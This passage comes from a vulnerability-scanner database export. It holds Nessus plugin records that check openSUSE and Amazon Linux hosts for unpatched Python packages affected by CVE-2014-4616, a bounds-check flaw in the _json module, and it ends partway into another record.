"p-cpe:/a:novell:opensuse:python3-dbm-debuginfo", "p-cpe:/a:novell:opensuse:python3-debuginfo", "p-cpe:/a:novell:opensuse:python3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python3-debugsource", "p-cpe:/a:novell:opensuse:python3-devel", "p-cpe:/a:novell:opensuse:python3-devel-debuginfo", "p-cpe:/a:novell:opensuse:python3-doc-pdf", "p-cpe:/a:novell:opensuse:python3-idle", "p-cpe:/a:novell:opensuse:python3-testsuite", "p-cpe:/a:novell:opensuse:python3-testsuite-debuginfo", 
"p-cpe:/a:novell:opensuse:python3-tk", "p-cpe:/a:novell:opensuse:python3-tk-debuginfo", "p-cpe:/a:novell:opensuse:python3-tools", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-458.NASL", "href": "https://www.tenable.com/plugins/nessus/76488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-458.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76488);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4616\");\n\n script_name(english:\"openSUSE Security Update : python / python3 (openSUSE-SU-2014:0890-1)\");\n script_summary(english:\"Check for the openSUSE-2014-458 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"python and python3 were updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Missing boundary check in JSON module (CVE-2014-4616)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=884075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-07/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python / python3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-dbm\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:python3-dbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-testsuite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython3_3m1_0-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython3_3m1_0-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debugsource-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", 
reference:\"python-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-debugsource-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-demo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-devel-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-doc-pdf-2.7-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-idle-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-debugsource-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-curses-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-curses-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-dbm-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-dbm-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-debugsource-3.3.0-6.19.1\") 
) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-devel-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-devel-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-doc-pdf-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-idle-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-testsuite-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-testsuite-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tk-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tk-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tools-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-base-32bit-3.3.0-6.19.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-base-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython2_7-1_0-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython2_7-1_0-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython3_3m1_0-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython3_3m1_0-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-debugsource-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-curses-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-curses-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-debugsource-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-demo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-devel-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-doc-pdf-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-gdbm-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-gdbm-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-idle-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"python-tk-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-tk-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-xml-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-xml-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-debugsource-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-curses-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-curses-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-dbm-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-dbm-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-debugsource-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-devel-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-devel-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-doc-pdf-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-idle-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-testsuite-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-testsuite-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-tk-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"python3-tk-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-tools-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-base-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-base-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-base-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:10:21", "description": "It was reported that Python built-in _json 
module has a flaw (insufficient bounds checking), which allows a local user to read arbitrary memory of the current process.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.'", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : python27 (ALAS-2014-380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python27", "p-cpe:/a:amazon:linux:python27-debuginfo", "p-cpe:/a:amazon:linux:python27-devel", "p-cpe:/a:amazon:linux:python27-libs", "p-cpe:/a:amazon:linux:python27-test", "p-cpe:/a:amazon:linux:python27-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-380.NASL", "href": "https://www.tenable.com/plugins/nessus/78323", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-380.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78323);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/19 11:02:41\");\n\n script_cve_id(\"CVE-2014-4616\");\n 
script_xref(name:\"ALAS\", value:\"2014-380\");\n\n script_name(english:\"Amazon Linux AMI : python27 (ALAS-2014-380)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that Python built-in _json module have a flaw\n(insufficient bounds checking), which allows a local user to read\ncurrent process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able\nto control or influence the two parameters of the default scanstring\nfunction: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index\nvalue. The index value is then used directly as an index to an array\nin the C code; internally the address of the array and its index are\nadded to each other in order to yield the address of the value that is\ndesired. 
However, by supplying a negative index value and adding this\nto the address of the array, the processor's register value wraps\naround and the calculated value will point to a position in memory\nwhich isn't within the bounds of the supplied string, causing the\nfunction to access other parts of the process memory.'\"\n );\n # http://bugs.python.org/issue21529\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue21529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-380.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python27' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python27-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-debuginfo-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-devel-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-libs-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-test-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-tools-2.7.5-13.35.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python27 / python27-debuginfo / python27-devel / python27-libs / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:14", "description": "It was reported 
